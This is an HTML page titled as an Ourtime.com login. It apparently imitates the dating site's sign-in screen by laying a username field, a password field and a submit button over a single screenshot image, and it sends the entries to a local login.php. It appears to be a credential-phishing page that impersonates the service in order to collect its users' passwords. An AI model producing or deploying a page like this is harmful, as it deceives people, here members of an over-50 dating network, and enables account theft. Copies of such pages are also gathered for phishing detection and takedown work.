<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Ourtime.com The 50+ Single Network</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1347px; height:554px; z-index:0"><img src="images/paste289.jpg" alt="" title="" border=0 width=1347 height=554></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:209px;left:231px;top:164px;z-index:2;height: 31px;" required>
<input name="formtext2" type="password" style="position:absolute;width:209px;left:231px;top:213px;z-index:3;height: 31px;" required>
<div id="formcheckbox1" style="position:absolute; left:226px; top:255px; z-index:4"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:225px; top:284px; z-index:5"><input type="image" name="formimage1" width="75" height="50" src="images/loaonm.JPG"></div>
</form>


</body>
</html>
